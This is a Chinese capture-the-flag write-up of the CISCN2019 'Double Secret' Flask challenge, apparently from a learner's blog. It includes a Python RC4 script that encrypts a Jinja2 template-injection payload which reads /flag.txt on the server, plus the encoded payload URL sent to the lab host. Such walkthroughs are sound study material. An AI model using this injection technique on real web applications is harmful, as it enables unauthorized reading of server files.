CISCN2019-华东南赛区-Double-Secret

还是太菜了

0X01 打开靶机地址，使用Dirsearch进行扫描查看子目录

• Dirsearch扫描网站子目录命令 🍖

python dirsearch.py -u URL -e.php 

• 在URL后面添加扫面的子目录，只要robots.txt有些提示，提示如下(然并软 😓 )

It is Android ctf

0X02 使用BP进行抓包

没有任何线索

想起了页面的提示 Double Secret重新构建URL

0X03 重新构造URL

http://1e053da9-5f6a-4ffb-a109-4bbcaf0695d8.node3.buuoj.cn/secret

• 根据提示，我们double一下

• 我们发现在"secret="后，后面添加不同数字就会产生不同的数值。（这个时候我们的思路大致是SQL，flask，PHP伪协议）💇

0X04 经过验证，无法使用php伪协议，SQL注入拿到flag，我们试一试flask（后面页面的内容也证实了我们的观点）

1. 先随便输入几个字符串

2. 代码如下(暗示得非常明显了 🐹 )

​if(secret==None)
    return 'Tell me your secret.I will encrypt it so others can\'t see'
rc=rc4_Modified.RC4("HereIsTreasure")   #解密
deS=rc.do_crypt(secret)
 
a=render_template_string(safe(deS))
 
if 'ciscn' in a.lower():
    return 'flag detected!'
return a
 

3. 进行代码审计🐺

File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1799, in dispatch_request
return self.view_functions[rule.endpoint](**req.view_args)
File "/app/app.py", line 35, in secret
    if(secret==None): #如果secret为空
        return 'Tell me your secret.I will encrypt it so others can\'t see' #返回这句话
    rc=rc4_Modified.RC4("HereIsTreasure")   #RC4解密
        

对我们传入的参数开始进行判断，如果参数是空，就会返回”Tell me your secret.I will encrypt it so others can’t see“这句话，如果传入参数，就会进行RC4加密。同时泄露了密钥"HereIsTreasure" :happy:

4.构造一下RC4加密脚本

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))
    # print("原来的 s 盒：%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒：%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("加密后的字符串是：%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")

5.得到加密的字符串

.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92

6.在之前构建的URL后面输入加密的字符串

http://2afce8f4-7dee-42fa-bb7a-c9eb932c319e.node3.buuoj.cn/secret?secret=.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92

拿到flag:happy:

'class' is not allowed. Secret is flag{6e76b7ec-1f75-4686-8096-bfa9f35caf9f}

总结考点：模板注入，RC4加密，python编写脚本